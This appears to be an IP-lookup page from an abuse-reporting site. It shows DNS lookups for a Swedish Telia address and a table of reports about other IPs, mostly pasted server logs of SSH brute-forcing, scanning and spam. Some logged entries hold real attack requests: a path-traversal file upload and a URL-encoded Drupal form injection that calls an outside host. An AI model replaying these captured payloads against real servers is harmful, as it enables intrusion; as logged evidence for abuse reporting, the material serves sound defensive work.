城市(city): unknown
省份(region): unknown
国家(country): Sweden
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 212.28.208.160
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 13751
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;212.28.208.160. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025022200 1800 900 604800 86400
;; Query time: 10 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Feb 22 18:24:04 CST 2025
;; MSG SIZE rcvd: 107
160.208.28.212.in-addr.arpa domain name pointer 212-28-208-160.customer.telia.com.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
160.208.28.212.in-addr.arpa name = 212-28-208-160.customer.telia.com.
Authoritative answers can be found from:
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 121.138.174.176 | attack | May 6 17:49:14 mail sshd\\[17774\\]: Invalid user admin from 121.138.174.176\\ May 6 17:49:15 mail sshd\\[17774\\]: Failed password for invalid user admin from 121.138.174.176 port 47833 ssh2\\ May 6 17:49:17 mail sshd\\[17774\\]: Failed password for invalid user admin from 121.138.174.176 port 47833 ssh2\\ May 6 17:49:19 mail sshd\\[17774\\]: Failed password for invalid user admin from 121.138.174.176 port 47833 ssh2\\ May 6 17:49:21 mail sshd\\[17774\\]: Failed password for invalid user admin from 121.138.174.176 port 47833 ssh2\\ May 6 17:49:23 mail sshd\\[17774\\]: Failed password for invalid user admin from 121.138.174.176 port 47833 ssh2\\ |
2019-05-25 07:34:15 |
| 124.235.138.144 | bots | 124.235.138.144 - - [23/May/2019:12:41:36 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 101.249.227.246 - - [23/May/2019:12:41:36 +0800] "GET /favicon.ico HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 101.249.227.246 - - [23/May/2019:12:41:37 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 101.249.227.246 - - [23/May/2019:12:41:38 +0800] "GET /home/favicon.ico HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" 101.249.227.246 - - [23/May/2019:12:41:39 +0800] "GET /home/favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" 124.235.138.144 - - [23/May/2019:12:41:42 +0800] "GET /home/favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" |
2019-05-23 13:08:18 |
| 83.144.110.218 | attack | May 25 01:04:05 icinga sshd[31818]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=83.144.110.218 May 25 01:04:07 icinga sshd[31818]: Failed password for invalid user lei from 83.144.110.218 port 57144 ssh2 |
2019-05-25 07:33:45 |
| 104.152.52.70 | botsattack | 104.152.52.70 - - [16/May/2019:03:44:31 +0800] "l\\x00\\x0B\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" 400 182 "-" "-" 104.152.52.70 - - [16/May/2019:03:44:31 +0800] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 301 194 "-" "-" 104.152.52.70 - - [16/May/2019:03:44:37 +0800] "" 400 0 "-" "-" |
2019-05-16 06:06:42 |
| 195.154.183.53 | attack | The offending parameter was "--30e4a130ae8b343fec4c347041c030a5 Content-Disposition:_form-data;_name" with a value of ""action" upload --30e4a130ae8b343fec4c347041c030a5 Content-Disposition: form-data; name="upload-dir" ../ --30e4a130ae8b343fec4c347041c030a5 Content-Disposition: form-data; name="upload-overwrite" 0 --30e4a130ae8b343fec4c347041c030a5 Content-Disposition: form-data; name="Filedata"; filename="pwn.gif" --30e4a130ae8b343fec4c347041c030a5-- ". |
2019-06-09 04:58:28 |
| 95.105.40.162 | normal | yandex的一个转换服务 95.105.40.162 - - [17/May/2019:17:16:42 +0800] "GET /check-ip/2804:14d:5a83:449f:5ab:f26:15e4:e7ce HTTP/1.1" 200 7986 "https://iframe-toloka.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 YaBrowser/19.3.2.176 Yowser/2.5 Safari/537.36" |
2019-05-17 17:21:58 |
| 212.64.27.235 | attack | May 25 01:28:20 dedicated sshd[28058]: Invalid user osmc from 212.64.27.235 port 56391 |
2019-05-25 07:30:15 |
| 31.220.40.54 | attack | May 24 19:10:21 TORMINT sshd\\[25453\\]: pam_unix\\(sshd:auth\\): authentication failure\\; logname= uid=0 euid=0 tty=ssh ruser= rhost=31.220.40.54 user=root May 24 19:10:24 TORMINT sshd\\[25453\\]: Failed password for root from 31.220.40.54 port 31238 ssh2 May 24 19:10:27 TORMINT sshd\\[25457\\]: pam_unix\\(sshd:auth\\): authentication failure\\; logname= uid=0 euid=0 tty=ssh ruser= rhost=31.220.40.54 user=root |
2019-05-25 07:38:04 |
| 123.249.83.139 | attack | 事件類型:Misc Attack 特徵碼:ET DROP Spamhaus DROP Listed Traffic Inbound group 7 |
2019-06-10 01:38:52 |
| 31.184.238.211 | spam | 垃圾评论 |
2019-05-13 09:27:19 |
| 94.240.33.162 | attack | Bruteforce ssh scans |
2019-05-28 23:42:41 |
| 182.254.197.152 | attack | 182.254.197.152 - - [14/May/2019:06:42:16 +0800] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6http://118.25.52.138/ HTTP/1.1" 301 194 "-" "Mozilla/5.0 (W |
2019-05-14 07:15:21 |
| 23.237.122.122 | bots | 23.237.122.122 - - [17/May/2019:17:37:28 +0800] "GET /check-ip/47.253.193.179 HTTP/1.1" 200 9984 "-" "Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8" 23.237.122.122 - - [17/May/2019:17:37:28 +0800] "GET /check-ip/69.161.117.253 HTTP/1.1" 200 10479 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre" 23.237.122.122 - - [17/May/2019:17:37:29 +0800] "GET /check-ip/15.174.189.211 HTTP/1.1" 200 9934 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101128 Firefox/4.0b8pre" 23.237.122.122 - - [17/May/2019:17:37:29 +0800] "GET /check-ip/8.161.48.175 HTTP/1.1" 200 11252 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1" |
2019-05-17 17:38:11 |
| 222.168.130.186 | attack | port scan and connect, tcp 1433 (ms-sql-s) |
2019-06-12 10:45:39 |
| 198.20.99.130 | attack | 3389BruteforceFW21 |
2019-06-12 10:46:09 |